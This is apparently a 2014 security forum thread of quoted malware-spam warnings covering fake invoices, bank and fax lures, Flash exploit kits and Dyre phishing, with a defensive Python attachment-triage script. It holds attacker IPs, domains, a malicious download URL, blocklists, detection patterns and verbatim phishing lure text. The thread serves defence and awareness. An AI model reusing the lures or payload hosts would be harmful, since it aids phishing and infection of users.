Oct 21, 2014 - "As businesses face a growing threat of cyber attacks, Israeli start-up ThetaRay is betting on maths to provide early detection, enabling the shutdown of systems before damage can be done. The year-old company's first investor was venture capital firm Jerusalem Venture Partners. It is now also backed by heavyweights like General Electric, which uses ThetaRay to protect critical infrastructure such as power plants, and Israel's biggest bank, Hapoalim, which deployed the technology to detect bank account anomalies... Cyber security providers are moving away from protecting gateways with defenses such as firewalls to focus on detecting and preventing attacks before they penetrate organizations... Security experts estimate it can take more than -200- days to identify a cyber attack once it's been launched... Once a threat has been detected, ThetaRay leaves it up to humans to decide whether or not to shut down the system..."
:mad: :fear:
AplusWebMaster
2014-10-22, 16:14
FYI...
Fake Debt Recovery SPAM - PDF malware
- http://myonlinesecurity.co.uk/bd-digital-supplies-commercial-debt-recovery-fake-pdf-malware/
22 Oct 2014 - "An email coming from random senders pretending to be B&D Digital Supplies or B&D Computers which is all about debt recovery and threatening legal action with a subject of 'Commercial Debt Recovery', Ref No: [random numbers] is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer... The email looks like:
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/commercial-debt-recovery.png
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
___
Fake customer service SPAM - doc malware
- http://myonlinesecurity.co.uk/customer-service-word-doc-malware/
22 Oct 2014 - "An email pretending to have a word document invoice attachment with a subject of Reference: [random characters] coming from [random name] 'customer service' at an unspecified company is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer... The email looks like:
This email contains an invoice file attachment ID:VZY563200VA
Thanks!
Kelli Horn .
22 October 2014: ENC094126XJ.doc - Current Virus total detections: 0/54*. Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email program..."
* https://www.virustotal.com/en/file/d328ceac71beead36034d6f74671a84c197cf2fa9e2155885aa720363045eb0e/analysis/1413973355/
___
Fake Malformed or infected word docs with embedded macro viruses
- http://myonlinesecurity.co.uk/malformed-infected-word-docs-embedded-macro-viruses/
22 Oct 2014 - "We are seeing loads of emails with Malformed or infected word docs with embedded macro viruses. They have what appears to be a genuine word doc attached, which is malformed and contains a macro or vba script virus. Modern versions of Microsoft office, that is Office 2010 and 2013 and Office 365, have Macros disabled by default, UNLESS you or your company have enabled them. Opening this malicious word document will infect you if Macros are enabled, and simply previewing it in windows explorer or your email client might well be enough to infect you... Do -not- open word docs received in an email without scanning them with your antivirus first, and be aware that there are a lot of dodgy word docs spreading that WILL infect you with no action from you if you are still using an outdated or vulnerable version of word. This is a good reason to update your office programs to a recent version and stop using office 2003 and 2007. The risks in using older versions are starting to outweigh the convenience, benefits and cost of keeping an old version going... All modern versions of word and other office programs, that is 2010, 2013 and 365, should open word docs, excel files and PowerPoint etc that are downloaded from the web or received in an email automatically in “protected view”, which stops any embedded malware or macros from being displayed and running. Make sure protected view is set in all office programs to protect you and your company from these sorts of attacks..."
- http://blog.dynamoo.com/2014/10/this-email-contains-invoice-file.html
22 Oct 2014
Screenshot: https://3.bp.blogspot.com/-1zwDnotABo4/VEeoiHJ74iI/AAAAAAAAF3Y/mKs9rkfW_oY/s1600/image1.gif
VT1: https://www.virustotal.com/en-gb/file/992fefe6c60d93693be7790a03880cc39a6cc7eb197c8e28bafd53c5ebbfe638/analysis/1413981604/
... Behavioural information
DNS requests
VBOXSVR.ovh.net: 213.186.33.6: https://www.virustotal.com/en-gb/ip-address/213.186.33.6/information/
TCP connections
178.250.243.114: https://www.virustotal.com/en-gb/ip-address/178.250.243.114/information/
91.240.238.51: https://www.virustotal.com/en-gb/ip-address/91.240.238.51/information/
VT2: https://www.virustotal.com/en-gb/file/73602b79321bc8190aed0aa9dd8ea0ef8997a37e92a64932ec258cb1b74f0788/analysis/1413982865/
___
Fake Wells Fargo SPAM – PDF malware
- http://myonlinesecurity.co.uk/wells-fargo-new-secure-message-fake-pdf-malware/
22 Oct 2014 - "An email pretending to come from Wells Fargo with a subject of 'You have a new Secure Message' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
You have received a secure message
Read your secure message by download AccountDocuments-10345.zip. You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
In order to view the secure message please download it using our Cloud Hosting...
22 October 2014: document_013982_pdf.zip: Extracts to: document_013982_pdf.exe
Current Virus total detections: 5/54*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/de18e69c371dbd2f684e2dbcb40fa768c5ed8739182e75f4be90d81907e9e247/analysis/1413986180/
... Behavioural information
TCP connections
188.165.214.6: https://www.virustotal.com/en-gb/ip-address/188.165.214.6/information/
82.98.161.71: https://www.virustotal.com/en-gb/ip-address/82.98.161.71/information/
188.165.237.144: https://www.virustotal.com/en-gb/ip-address/188.165.237.144/information/
80.157.151.17: https://www.virustotal.com/en-gb/ip-address/80.157.151.17/information/
UDP communications
173.194.71.127: https://www.virustotal.com/en-gb/ip-address/173.194.71.127/information/
___
Flash Player exploit in-the-wild - CVE-2014-0569
- https://blog.malwarebytes.org/exploits-2/2014/10/cyber-criminals-quickly-adopt-critical-flash-player-vulnerability/
Oct 22, 2014 - "... less than a week ago, a critical flaw in the Flash Player (CVE-2014-0569*) was patched and made public:
* https://helpx.adobe.com/security/products/flash-player/apsb14-22.html
The vulnerability had been privately reported to Adobe through the Zero Day Initiative group, giving the firm the time to fix the issue before it became known to the world. Typically security researchers and criminals will be very attentive to such news, and skilled reverse engineers will start looking at the patch to be able to reconstruct the exploit. All things considered, there is normally a certain amount of time before a proof of concept is released and then a little more time before that poc is weaponized by the bad guys... Kafeine**... stumbled upon that same CVE in a real world exploit kit (Fiesta EK) only one -week- after the official security bulletin had been published... That means we have less and less time to deploy and test security patches. Perhaps this is not too much of a deal for individuals, but it can be more difficult for businesses which need to roll out patches on dozens of machines, hoping doing so will not cause malfunctions in existing applications. In any case, this was our first chance to test CVE-2014-0569 in the wild by triggering the Fiesta EK against Malwarebytes Anti-Exploit:
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/FiestaCVE-2014-0569.png
It is crucial to patch any system running outdated Flash Player versions as soon as possible! You can check the version you are running (make sure to do this in all the browsers you use) by going here:
>> http://www.adobe.com/software/flash/about/
The bad guys are not going to run short of vulnerabilities they can weaponize at a quicker rate than ever before. This leaves end-users with very little room for mistakes such as failing to diligently apply security patches -sooner- rather than later..."
** http://malware.dontneedcoffee.com/2014/10/cve-2014-0569.html
> https://blog.malwarebytes.org/tag/fiesta-ek/
:mad: :fear:
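The two recurring attachment tricks in the posts above (an executable named like "document_013982_pdf.exe" so that it shows a document icon when known extensions are hidden, and a legacy Word .doc carrying a VBA macro project) can be triaged before anyone opens the file. The script below is an added example, not code from any of the quoted blogs; the sample archive is constructed inline, the member names are borrowed from the posts, and the macro check is a byte-pattern heuristic on the OLE stream name rather than a full OLE parse.

```python
"""Attachment triage for ZIP attachments: disguised executables and macro documents."""
import io
import re
import zipfile

EXEC_EXTENSIONS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "vbs", "jar"}
DOC_EXTENSIONS = {"pdf", "doc", "docx", "xls", "xlsx", "rtf", "txt"}
MZ_MAGIC = b"MZ"                                   # Windows PE executable
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"     # legacy .doc/.xls container
ZIP_MAGIC = b"PK\x03\x04"                          # OOXML (.docx) container
# OLE directory entries store stream names as UTF-16LE; this stream only
# exists when the document has a VBA project (heuristic, not a full parse).
VBA_STREAM_MARKER = "_VBA_PROJECT".encode("utf-16-le")
MAX_MEMBER_BYTES = 8 * 1024 * 1024                 # skip decompressing huge members


def split_name(member: str):
    """Return (stem, lowercase extension) of the last path component."""
    base = member.rsplit("/", 1)[-1]
    stem, dot, ext = base.rpartition(".")
    return (stem, ext.lower()) if dot else (base, "")


def classify(member: str, data: bytes) -> list:
    """Reasons this file deserves a second look; an empty list means nothing found."""
    reasons = []
    stem, ext = split_name(member)
    if not data:
        reasons.append("empty file (0 bytes)")
    if ext in EXEC_EXTENSIONS:
        reasons.append(f"executable extension .{ext}")
    # "document_013982_pdf.exe": a document type buried in the stem so the
    # name reads as a PDF once Windows hides the real extension
    hidden = [t for t in re.split(r"[ _\-.]+", stem.lower()) if t in DOC_EXTENSIONS]
    if hidden and ext not in DOC_EXTENSIONS:
        reasons.append(f"looks like a .{hidden[-1]} but real extension is .{ext or '(none)'}")
    if data.startswith(MZ_MAGIC) and ext not in EXEC_EXTENSIONS:
        reasons.append("PE header with a non-executable extension")
    if data.startswith(OLE_MAGIC) and VBA_STREAM_MARKER in data:
        reasons.append("legacy Office file with a VBA project stream (macro)")
    if data.startswith(ZIP_MAGIC):
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as inner:
                if any(n.endswith("vbaProject.bin") for n in inner.namelist()):
                    reasons.append("OOXML document with vbaProject.bin (macro)")
        except zipfile.BadZipFile:
            reasons.append("ZIP signature but archive is corrupt")
    return reasons


def triage_zip(archive: bytes) -> dict:
    """Map every file member of the attachment ZIP to its list of reasons."""
    results = {}
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            if info.file_size > MAX_MEMBER_BYTES:
                results[info.filename] = ["member too large, not inspected"]
                continue
            results[info.filename] = classify(info.filename, zf.read(info))
    return results


def build_sample_archive() -> bytes:
    """Constructed stand-in for an attachment such as AccountDocuments-10345.zip."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("document_013982_pdf.exe", MZ_MAGIC + b"\x90" * 64)   # PDF-looking .exe
        zf.writestr("invoice_8014042.doc", OLE_MAGIC + b"\x00" * 32 + VBA_STREAM_MARKER)
        zf.writestr("statement.pdf", MZ_MAGIC + b"\x90" * 64)             # PE behind a .pdf name
        zf.writestr("adb-102288-invoice.doc", b"")                          # the 0-byte sample
        zf.writestr("quarterly.pdf", b"%PDF-1.4\n%%EOF\n")                   # genuinely a PDF
    return buf.getvalue()


if __name__ == "__main__":
    for name, reasons in triage_zip(build_sample_archive()).items():
        print(f"{name}: {'; '.join(reasons) or 'no findings'}")
```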
AplusWebMaster
2014-10-23, 15:46
FYI...
Fake 'Order Confirmation' SPAM
- http://blog.dynamoo.com/2014/10/fake-supertouchcom-allied-international.html
23 Oct 2014 - "This fake Order Confirmation spam pretends to come from supertouch.com / Allied International Trading Limited but doesn't. The email is a -forgery- originating from an organised crime ring, it does not originate from supertouch .com / Allied International Trading Limited nor have their systems been compromised in any way.
From: Elouise Massey [Elouise.Massey@ supertouch .com]
Date: 23 October 2014 10:52
Subject: Order Confirmation
Hello,
Thank you for your order, please check and confirm.
Kind Regards
Elouise
Allied International Trading Limited ...
In the sample I received, the attachment was -corrupt- but should have been a malicious Word document S-CON-A248-194387.doc. The document and payload are exactly the same as the one being sent out today with this spam run[1] (read that post for more details) and is very poorly detected, although blocking access to the following IPs and domains might help mitigate against it:
87.106.84.226
84.40.9.34
jvsfiles .com "
[1] http://blog.dynamoo.com/2014/10/fake-humber-merchants-group.html
62.75.182.94: https://www.virustotal.com/en/ip-address/62.75.182.94/information/
___
Fake 'bank detail' SPAM - trojan
- http://blog.mxlab.eu/2014/10/23/fake-email-regarding-bitstamp-new-banking-details-contains-trojan/
Oct 23, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “New bank details”. This email is sent from the spoofed address “"Bitstamp .net" <no_reply@ bitstamp .net>”, while the real SMTP sender is AmericanExpress@ welcome .aexp .com, and has the following body:
New banking details
Dear Bitstamp clients,
We would like to inform you that Bitstamp now has new bank details, please check attached file.
We would like to assure those of you who sent deposits to our old details that our old IBAN is still active and your transfers, if otherwise sent with correct information, should arrive without a problem.
Please note that SEPA transfers usually take 1 to 3 business days to arrive and would kindly ask those waiting for your SEPA transfers longer than usually to please send us a transfer confirmation so that we can examine our bank account log and locate your transfers.
Also for those waiting on deposits we ask for your patience; we have accumulated a long list of transfers which lack information or contain wrong information which means we need to manually go through all of them instead of our system sorting them automatically.
Best regards
CEO, Nejc Kodrič
Bitstamp LIMITED
The attached ZIP file has the name bank details.zip and contains the 24 kB large file bank details.scr. The trojan is known as Troj.W32.Gen, a variant of Win32/Kryptik.COEK, HEUR/QVM20.1.Malware.Gen or Mal/Generic-S. At the time of writing, 4 of the 53 AV engines did detect the trojan at Virus Total*. Now, MX Lab has also intercepted some emails -without- the malicious attachment but be aware that this email is a risk..."
* https://www.virustotal.com/en/file/83fc76ba29762e28fc80c08085003b811a1fa3eae51635f99ff35b4022fd1769/analysis/1414073432/
... Behavioural information
DNS requests
VBOXSVR. ovh .net: 213.186.33.6: https://www.virustotal.com/en/ip-address/213.186.33.6/information/
___
Two exploit kits prey on Flash Player flaw patched only last week
- http://net-security.org/malware_news.php?id=2892
23.10.2014 - "Two exploit kits prey on Flash Player flaw patched only last week... The integer overflow vulnerability in question (CVE-2014-0569*) can allow attackers to execute arbitrary code via unspecified vectors, and is deemed critical (high impact, easily exploitable)... the time period was very short, and technical information about the vulnerability and exploit code hasn't yet been shared online... The exploit kits are used to deliver the usual assortment of malware, and some of the variants have an extremely low detection rate... If you use Adobe Flash Player, and you haven't implemented the latest patches, now would be a good time to rectify that mistake."
* https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0569 - 10.0
- http://atlas.arbor.net/briefs/index#1049793989
Elevated Severity
23 Oct 2014
- http://www.securitytracker.com/id/1031019
CVE Reference: CVE-2014-0558, CVE-2014-0564, CVE-2014-0569
Oct 14 2014
Impact: Execution of arbitrary code via network, User access via network
Fix Available: Yes Vendor Confirmed: Yes
Solution: The vendor has issued a fix (13.0.0.250 extended support release, 15.0.0.189 for Windows/Mac, 11.2.202.411 for Linux)...
Flash 15.0.0.189 released: https://helpx.adobe.com/security/products/flash-player/apsb14-22.html
Oct 14, 2014
For I/E: http://download.macromedia.com/get/flashplayer/current/licensing/win/install_flash_player_15_active_x.exe
For Firefox (Plugin-based browsers): http://download.macromedia.com/get/flashplayer/current/licensing/win/install_flash_player_15_plugin.exe
Flash test site: http://www.adobe.com/software/flash/about/
___
Fake VoiceMail SPAM
- http://blog.dynamoo.com/2014/10/voice-mail-voicemailsendervoicemailcom.html
23 Oct 2014 - "Before you open something like this.. think if you really get voice mail notifications through your email. No? Well, -don't- open it.
From: "Voice Mail" [voicemail_sender@ voicemail .com]
Date: Thu, 23 Oct 2014 14:31:22 +0200
Subject: voice message from 598-978-8974 for mailbox 833
You have received a voice mail message from 598-978-8974
Message length is 00:00:33. Message size is 264 KB.
Download your voicemail message from dropbox service below (Google Disk
Drive Inc.) ...
Clicking the link goes to a script that detects if the visitor is running Windows, if so it downloads a file doc_9231-92_pdf.zip from the target system which in turn contains a malicious executable doc_9231-92_pdf.exe which has a VirusTotal detection rate of 4/51*... 188.165.214.6 is rather unsurprisingly allocated to OVH France. It also drops a couple of executables onto the system... Recommended blocklist:
188.165.214.6
inaturfag .com "
* https://www.virustotal.com/en-gb/file/d0d1c65304481df41fb55c9962e057a1029bd8a28f5a1b75835e1025c25887c0/analysis/1414075720/
___
Fake BoA SPAM – PDF malware
- http://myonlinesecurity.co.uk/mamie-french-bank-america-unknown-incoming-wire-fake-pdf-malware/
23 Oct 2014 - "'Mamie French Bank of America Unknown incoming wire' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
The banking activity with today’s posting date shows Electronic Fund Transfer (EFT) that has been received. Our bank has noted the following information:
EFT Amount: $ 6,200.00
Remitted From: SSA TREAS 310 MISC PAY
Designated for: UNKNOWN
Please download and open attachment with full imformation about this Electronic Fund Transfer payment.
If you confirm that it belongs to your agency or department, please email back or give us a call. Then, our office needs to receive a completed General Deposit no later than 10:00 a.m. tomorrow.
Note: If these funds cannot be identified or if no one claims this EFT, we are required to process the return of this EFT by 10:00 a.m., June 24, 2014.
Thank you.
Mamie French
Senior Accountant
Bank of America ...
23 October 2014: electronic_fund_transfer.zip: Extracts to: electronic_fund_transfer.scr
Current Virus total detections: 10/53*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/d0d1c65304481df41fb55c9962e057a1029bd8a28f5a1b75835e1025c25887c0/analysis/1414081814/
:fear: :mad:
AplusWebMaster
2014-10-24, 14:34
FYI...
Fake Invoice SPAM – Word doc malware
- http://myonlinesecurity.co.uk/invoice-8014042-october-word-doc-malware/
24 Oct 2014 - "'invoice 8014042 October' pretending to come from Sandra Lynch with a malformed word doc attachment containing a macro virus is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please find attached your October invoice, we now have the facility to email invoices,
but if you are not happy with this and would like a hard copy please let me know.
New bank details for BACS payments are Santander Bank Sort Code 8014042 Account No 5608014042.
Thanks very much
Kind Regards
Sandra Lynch
24 October 2014: invoice_8014042.doc: Current Virus total detections: 0/54*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
* https://www.virustotal.com/en/file/9659be0ec03fafcea7200032cdf3434ba14c99b9a8e0c3a16f5419d3817c48de/analysis/1414141144/
___
Fake Fax SPAM.. again.
- http://blog.dynamoo.com/2014/10/youve-received-new-fax-spam-again.html
24 Oct 2014 - "Another day, another -fake- fax spam.
From: Fax [fax@ victimdomain .com]
To: luke.sanson@ victimdomain .com
Date: 24 October 2014 10:54
Subject: You've received a new fax
New fax at SCAN2383840 from EPSON by https://victimdomain.com
Scan date: Fri, 24 Oct 2014 15:24:22 +0530
Number of pages: 2
Resolution: 400x400 DPI
You can secure download your fax message at ...
(eFax Drive is a file hosting service operated by J2, Inc.)
The link in the email goes to a script which (if the browser settings are correct) downloads a file document_92714-872_pdf.zip which in turn contains a malicious executable document_92714-872_pdf.exe which has a VirusTotal detection rate of 3/54*... The malware also drops two executables on the system, kcotk.exe (VT 0/53**...) and ptoma.exe (VT 2/51***...)... Recommended blocklist:
188.165.214.6
rodgersmith .com "
* https://www.virustotal.com/en/file/d9f637e2750f01b7d07451b4262a5d560ef2b5743db0a26881c4ebbd9e04373f/analysis/1414145184/
** https://www.virustotal.com/en-gb/file/8483369c80851bb2ecbf221b9d4c01dbd2980b7d3eb3c5829eccad62bef80651/analysis/1414145764/
*** https://www.virustotal.com/en-gb/file/b4798bbf747180a96b476af6adf167bd62e5c8b5d92b0c994e8a42a45c3bd19e/analysis/1414145784/
___
Widespread malvertising - delivered ransomware
- http://net-security.org/malware_news.php?id=2894
24.10.2014 - "A newer version of the Cryptowall ransomware has been delivered to unsuspecting Internet users via malicious ads shown on a considerable number of high-profile websites, including properties in the Yahoo, Match.com, and AOL domains. According to Proofpoint's calculations*, the malvertising campaign started in late September, picked up the pace this month, and lasted until October 18 and likely even a bit longer... In this campaign, the attackers used already existing ads for legitimate products, and submitted it to at least three major ad network members (Rubicon Project, Right Media/Yahoo Advertising, and OpenX). Visitors to the sites that ended up serving the malicious ads were automatically infected with the ransomware if they used software with vulnerabilities exploitable by the FlashPack Exploit Kit. The ransomware then encrypted the victims' hard drive and asks for money in return for the decryption key. Unfortunately, even if the ransom is paid, there is no guarantee that the victim will actually receive the key. The ransom is supposed to be paid in Bitcoin, and the addresses the criminals used for this purpose are C&C server-generated and many... This particular campaign now seems to be over - all the affected parties (optimizers and ad networks) have been notified, and the malicious ads pulled. Still, that doesn't mean that the attackers have not switched to spreading CryptoWall 2.0 via other means..."
* http://www.proofpoint.com/threatinsight/posts/malware-in-ad-networks-infects-visitors-and-jeopardizes-brands.php
___
Ebola-themed emails deliver malware, exploit Sandworm vulnerability (MS14-060)
- http://net-security.org/malware_news.php?id=2895
24.10.2014 - "US CERT has recently issued a warning* about malware-delivery campaigns using users' fear of the Ebola virus and its spreading as a bait. One of the most prolific campaigns is the one that -impersonates- the World Health Organization:
> http://www.net-security.org/images/articles/who-spam-24102014.jpg
The emails in question initially -linked- to the -malware- a variant of the DarkKomet RAT tool, used by attackers to access and control the victim's computer remotely and steal information. After a while, the attackers began to attach the malware directly to the message, as access to the malicious file hosted on a popular cloud data storage service was blocked quickly by service administrators, noted Tatyana Shcherbakova:
> https://securelist.com/blog/spam-test/67344/a-false-choice-the-ebola-virus-or-malware/
According to Websense researchers**, Ebola-themed malicious emails and documents are also being used by attackers taking advantage of the recently discovered Sandworm vulnerability (CVE-2014-4114***)..."
* https://www.us-cert.gov/ncas/current-activity/2014/10/16/Ebola-Phishing-Scams-and-Malware-Campaigns
Oct 16, 2014
** http://community.websense.com/blogs/securitylabs/archive/2014/10/23/Ebola-Spreads-_2D00_-In-Cyber-Attacks-Too.aspx
*** https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4114 - 9.3 (HIGH)
___
Phalling for the phish...
- http://blog.dynamoo.com/2014/10/do-people-really-fall-for-this.html
24 Oct 2014 - "... a simple phishing spam..
From: info@ kythea .gr
Date: 24 October 2014 13:50
Subject: payment
this mail is to inform you that the payment have been made
see the attached file for the payment slip
ANTON ARMAS
Attached is a file payment Slip (2).html which displays a popup alert:
You have been signed out of this account this may have happened automatically cause the attachement needs authentication. to continue using this account, you will need to sign in again. this is done to protect your account and to ensure the privacy of your information
The victim then gets sent to a phishing page, in this case at uere.bplaced .net/blasted/tozaiboeki.webmail .html which looks like this..
> https://4.bp.blogspot.com/-dliSNtwDjPk/VEpWNYc6hyI/AAAAAAAAF48/S74-pPcyPuI/s1600/multiphish.jpg
... do people really fall for this? The frightening answer is.. probably, yes."
bplaced .net: 5.9.107.19: https://www.virustotal.com/en/ip-address/5.9.107.19/information/
:mad: :fear:
AplusWebMaster
2014-10-25, 14:24
FYI...
Fake 'New order' SPAM - malware
- http://myonlinesecurity.co.uk/daniela-lederer-re-new-order-malware/
25 Oct 2014 - "'Daniela Lederer Re: New Order' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/Daniela-Lederer-new-order.png
25 October 2014: J2134457863.zip: Extracts to: J2134457863.exe
Current Virus total detections: 14/54*. Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en-gb/file/e5b881143bd10304d8211fc4f2708839361cab6af59934d327150bcb0d098e86/analysis/1414216443/
:fear: :mad:
AplusWebMaster
2014-10-27, 13:45
FYI...
Fake KLM e-Ticket SPAM – PDF malware
- http://myonlinesecurity.co.uk/klm-e-ticket-fake-pdf-malware/
27 Oct 2014 - "'KLM e-Ticket' pretending to come from e-service @klm .com is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/klm_air_ticket.png
27 October 2014: e-Ticket_klm_Itinerary _pdf.zip: Extracts to: e-Ticket_klm_Itinerary _pdf.exe
Current Virus total detections: 2/53* . This 'KLM e-Ticket' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/d0a28086129c3e01e37868532f79cd72acb21d88443fb0a377b3b8a3c184ad88/analysis/1414404573/
___
Fake 'invoice xxxxxx October' SPAM - malicious Word doc
- http://blog.dynamoo.com/2014/10/randomly-generated-invoice-xxxxxx.html
27 Oct 2014 - "There have been a lot of these today:
From: Sandra Lynch
Date: 27 October 2014 12:29
Subject: invoice 0544422 October
Please find attached your October invoice, we now have the facility to email invoices,
but if you are not happy with this and would like a hard copy please let me know.
New bank details for BACS payments are Santander Bank Sort Code 0544422 Account No 5600544422.
Thanks very much
Kind Regards
Sandra Lynch
The numbers in the email are randomly generated, as is the filename of the attachment (in this example it was invoice_0544422.doc). The document itself is malicious and has a VirusTotal detection rate of 5/53*. Inside the Word document is a macro that attempts to download and execute a malicious binary from http ://centrumvooryoga .nl/docs/bin.exe which is currently 404ing which is a good sign. There's a fair chance that the spammers will use this format again, so always be cautious of unsolicited email attachments."
* https://www.virustotal.com/en/file/7dcc2db732fc3c3c8bfbee2539644c8fbc19648d6b82c2fd35bc3a513cd059e6/analysis/1414436717/
83.96.174.219: https://www.virustotal.com/en/ip-address/83.96.174.219/information/
___
Phish... linked with “Dyre” Banking Malware
- https://www.us-cert.gov/ncas/alerts/TA14-300A
Oct 27, 2014 - "Systems Affected: Microsoft Windows. Overview:
Since mid-October 2014, a phishing campaign has targeted a wide variety of recipients while employing the Dyre/Dyreza banking malware. Elements of this phishing campaign vary from target to target including senders, attachments, exploits, themes, and payloads... Although this campaign uses various tactics, the actor’s intent is to entice recipients into opening attachments and downloading malware... The Dyre banking malware specifically targets sensitive user account credentials. The malware has the ability to capture user login information and send the captured data to malicious actors... Phishing emails used in this campaign often contain a weaponized PDF attachment which attempts to exploit vulnerabilities found in -unpatched- versions of Adobe Reader... After successful exploitation, a user's system will download Dyre banking malware..."
___
FTC gets courts to shut down tech support scammers
- http://www.theinquirer.net/inquirer/news/2377916/us-ftc-gets-courts-to-shut-down-tech-support-scammers
Oct 27 2014 - "... the company, which called itself PairSys, would call people at home and claim to be from Microsoft or Facebook. This is a common scam, and the caller will often claim that the victim has a PC-based problem. In some cases people fall for this. It is estimated that PairSys made $2.5m from the scam and that it employed online adverts as well as phone calls as lures. "The defendants behind Pairsys targeted seniors and other vulnerable populations, preying on their lack of computer knowledge to sell ‘security' software and programs that had no value at all," said Jessica Rich, director of the FTC's Bureau of Consumer Protection... The defendants in the case, Pairsys, Uttam Saha and Tiya Bhattacharya, have agreed to the terms of a preliminary injunction, which includes an instruction to shut down their websites and telephone lines and not to sell on their customer data lists."
* http://www.ftc.gov/news-events/press-releases/2014/10/ftcs-request-court-shuts-down-new-york-based-tech-support-scam
> http://www.consumer.ftc.gov/blog
:fear: :mad:
AplusWebMaster
2014-10-28, 17:16
FYI...
Fake Invoice SPAM - Word doc malware
- http://myonlinesecurity.co.uk/please-find-attached-invoice-number-224244-power-ec-ltd-word-doc-malware/
28 Oct 2014 - "An email saying 'Please find attached INVOICE number 224244 from Power EC Ltd' pretending to come from soo.sutton[random number]@ powercentre .com with a subject of 'INVOICE [random number] from Power EC Ltd' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please find attached INVOICE number 224244 from Power EC Ltd
28 October 2014 : INVOICE263795.doc - Current Virus total detections: 3/54*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... macro malware**... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/472f0f4a671a76b4f5773b3f64033bf5bf8933134786797525d2c6590cdf3398/analysis/1414506485/
** http://myonlinesecurity.co.uk/malformed-infected-word-docs-embedded-macro-viruses/
- http://blog.dynamoo.com/2014/10/invoice-101760-from-power-ec-ltd-spam.html
28 Oct 2014
> https://www.virustotal.com/en/file/472f0f4a671a76b4f5773b3f64033bf5bf8933134786797525d2c6590cdf3398/analysis/1414519923/
Recommended blocklist:
62.75.184.70: https://www.virustotal.com/en/ip-address/62.75.184.70/information/
116.48.157.176: https://www.virustotal.com/en/ip-address/116.48.157.176/information/
___
Fake 'Ebola Alert Tool' ...
- https://blog.malwarebytes.org/online-security/2014/10/new-online-ebola-alert-tool-is-anything-but/
Oct 27, 2014 - "... More news of infection outside Africa such as this could further fuel the ever-increasing fear and anxiety for one’s own life and well-being, especially in terms of how one interacts with the outside world. People are trying to be more careful in their dealings than usual, always wanting to be in the know about the latest happenings. This is why web threats banking on perennial hot topics like Ebola could be effective lures against users, especially in the long run... Upon initial visit to the page, users are presented with the following prompt at the top-middle part of the screen:
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/ebola-with-prompts-1024x341.jpg
Below is a screenshot of the downloaded file with an overview of its details:
> http://blog.malwarebytes.org/wp-content/uploads/2014/10/ebolafile.png
EbolaEarlyWarningSystem.exe has a low detection rate as of this writing—four vendors detect it out of 53*... Upon execution, it displays a user interface prompting users to install the ONLY Search toolbar with links to its EULA and Privacy Policy pages. Once users click the “Agree” button, they are again presented with other offers to download, such as a program called Block-n-Surf (a supposed tool used to protect children from adult-related content), System Optimizer Pro (a tool that purportedly optimizes the user’s system), oneSOFTperday (a tool that gives users access to free apps), and a remote access tool among others:
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/install5.png?w=564
Once programs are installed, the following have been observed from affected systems: All browser default search pages are changed to ONLY Search:
> http://blog.malwarebytes.org/wp-content/uploads/2014/10/onlysearch.png
Once users open a new browser tab, affiliate sites are loaded up (e.g. a site offering insurance):
> http://blog.malwarebytes.org/wp-content/uploads/2014/10/insurance-affiliate.png
Browser windows open to prompt user to install more programs:
> http://blog.malwarebytes.org/wp-content/uploads/2014/10/pckeeper.png
System Optimizer Pro executes:
